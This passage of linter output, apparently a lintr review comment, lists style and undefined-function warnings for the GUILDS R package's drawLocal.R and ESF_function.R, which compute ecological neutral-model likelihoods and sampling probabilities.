j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < eps()] <- eps()\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n               ~^\n```\n[R/drawLocal.R:51:26:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n                        ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:57:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx0 <- which( x == 0 )\n            ~^\n```\n[R/drawLocal.R:58:11:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx0) > 0) {\n          ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux <- log(th) + lgamma(I) - lgamma(I+j) +\n                   ~^~~\n```\n[R/drawLocal.R:59:32:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux <- log(th) + lgamma(I) - lgamma(I+j) +\n                               ^~\n```\n[R/drawLocal.R:60:35:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                 ~^~\n```\n[R/drawLocal.R:60:39:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                     ~^~\n```\n[R/drawLocal.R:60:49:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                               ~^~\n```\n[R/drawLocal.R:61:37:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n                                   ~^~\n```\n[R/drawLocal.R:61:49:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n                                               ~^~\n```\n[R/drawLocal.R:61:51:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n                                                 ~^~\n```\n[R/drawLocal.R:62:25:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L62) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty[idx0] = aux\n                        ^\n```\n[R/drawLocal.R:64:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx1 = which(x == 1)\n             ^\n```\n[R/drawLocal.R:64:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L64) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx1 = which(x == 1)\n            ~^~\n```\n[R/drawLocal.R:65:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L65) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif (length(idx1) > 0) {\n           ^\n```\n[R/drawLocal.R:66:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                     ^\n```\n[R/drawLocal.R:66:25:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                       ~^~\n```\n[R/drawLocal.R:66:28:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                          ~^~~\n```\n[R/drawLocal.R:66:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                             ^\n```\n[R/drawLocal.R:66:31:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                              ^\n```\n[R/drawLocal.R:66:34:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                                ~^~~\n```\n[R/drawLocal.R:66:40:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                                       ^~~\n```\n[R/drawLocal.R:68:29:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                            ^\n```\n[R/drawLocal.R:68:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                             ^\n```\n[R/drawLocal.R:68:33:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                               ~^~~\n```\n[R/drawLocal.R:68:39:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                                      ^~~\n```\n[R/drawLocal.R:70:29:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                            ^\n```\n[R/drawLocal.R:70:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                             ^\n```\n[R/drawLocal.R:70:33:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                               ~^~~\n```\n[R/drawLocal.R:70:39:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                                     ~^~~\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp <- which((x > 0) & (x < 1))\n            ~^~~\n```\n[R/drawLocal.R:74:23:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp <- which((x > 0) & (x < 1))\n                      ^\n```\n[R/drawLocal.R:74:26:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp <- which((x > 0) & (x < 1))\n                         ^~\n```\n[R/drawLocal.R:74:31:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp <- which((x > 0) & (x < 1))\n                              ^~\n```\n[R/drawLocal.R:74:33:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp <- which((x > 0) & (x < 1))\n                                ^\n```\n[R/drawLocal.R:75:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\txx <- x[idxp]\n          ~^~~\n```\n[R/drawLocal.R:76:29:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I+j) +\n                           ~^~\n```\n[R/drawLocal.R:76:38:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I+j) +\n                                    ~^~\n```\n[R/drawLocal.R:77:27:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                         ~^~\n```\n[R/drawLocal.R:77:41:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                       ~^~\n```\n[R/drawLocal.R:77:45:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                           ~^\n```\n[R/drawLocal.R:78:28:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n                          ~^~\n```\n[R/drawLocal.R:78:33:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n                               ~^\n```\n[R/drawLocal.R:78:38:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n                                    ~^~\n```\n[R/drawLocal.R:79:28:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                          ~^~\n```\n[R/drawLocal.R:79:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L79) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                             ^\n```\n[R/drawLocal.R:79:33:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                               ~^~\n```\n[R/drawLocal.R:79:39:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                                     ~^~\n```\n[R/drawLocal.R:79:43:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                                         ~^\n```\n[R/drawLocal.R:79:48:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                                              ~^\n```\n[R/drawLocal.R:80:19:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n                  ^\n```\n[R/drawLocal.R:80:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n                     ^~\n```\n[R/drawLocal.R:80:34:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n                                ~^~\n```\n[R/drawLocal.R:87:5:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L87) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = JX + JY\n    ^\n```\n[R/drawLocal.R:88:6:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L88) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n     ^\n```\n[R/drawLocal.R:88:8:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n       ^~~~~\n```\n[R/drawLocal.R:88:8:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L88) *warning:* **no visible global function definition for ‘getPX’, Did you mean 'setPS'?**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n       ^~~~~\n```\n[R/drawLocal.R:89:6:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L89) *style:* **Use <-, not =, for assignment.**\n```r\n​  ny = 1 - nx\n     ^\n```\n[R/drawLocal.R:92:7:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L92) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/drawLocal.R:92:26:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L92) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/drawLocal.R:93:7:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L93) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/drawLocal.R:93:26:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L93) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/drawLocal.R:95:8:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L95) *style:* **Use <-, not =, for assignment.**\n```r\n​  sadx = pm_sad(theta, I_X, JX)\n       ^\n```\n[R/drawLocal.R:95:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L95) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx = pm_sad(theta, I_X, JX)\n         ^~~~~~\n```\n[R/drawLocal.R:96:8:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L96) *style:* **Use <-, not =, for assignment.**\n```r\n​  sady = pm_sad(theta, I_Y, JY)\n       ^\n```\n[R/drawLocal.R:96:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L96) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady = pm_sad(theta, I_Y, JY)\n         ^~~~~~\n```\n[R/drawLocal.R:107:27:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L107) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/drawLocal.R:107:66:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L107) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/drawLocal.R:108:27:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L108) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:111:3:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:112:5:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L112) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/drawLocal.R:113:28:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L113) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/drawLocal.R:113:33:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/drawLocal.R:114:27:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  (lgamma(allN + 1) + \n                          ^~~~\n```\n[R/drawLocal.R:114:38:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L114) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(allN + 1) + \n                                     ^\n```\n[R/drawLocal.R:115:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/drawLocal.R:115:42:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/drawLocal.R:116:21:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    allN * log(nx) + \n                    ^~~~\n```\n[R/drawLocal.R:116:37:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L116) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    allN * log(nx) + \n                                    ^\n```\n[R/drawLocal.R:117:23:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L117) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-allN) * log(ny))\n                     ~^~\n```\n[R/drawLocal.R:117:24:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L117) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    (J-allN) * log(ny))\n                       ^~~~\n```\n[R/drawLocal.R:119:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- PolyaEggenberger(I_X, I_Y, J, allN) #set up a probability vector\n             ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:119:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L119) *warning:* **no visible global function definition for ‘PolyaEggenberger’**\n```r\n​    probs <- PolyaEggenberger(I_X, I_Y, J, allN) #set up a probability vector\n             ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:119:44:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- PolyaEggenberger(I_X, I_Y, J, allN) #set up a probability vector\n                                           ^~~~\n```\n[R/drawLocal.R:125:11:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L125) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:126:11:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L126) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1 || \n    ^\n```\n[R/ESF_function.R:2:18:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(theta < 1 || \n                 ^\n```\n[R/ESF_function.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​     m > (1-.Machine$double.eps) ||\n          ~^~\n```\n[R/ESF_function.R:9:5:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = sum(abund)\n    ^\n```\n[R/ESF_function.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  S = length(abund)\n    ^\n```\n[R/ESF_function.R:11:5:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  I = m * (J-1) / (1 - m)\n    ^\n```\n[R/ESF_function.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​  I = m * (J-1) / (1 - m)\n           ~^~\n```\n[R/ESF_function.R:13:7:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L13) *style:* **Use <-, not =, for assignment.**\n```r\n​  kda = calcKDA(abund)  #confirmed in PARI\n      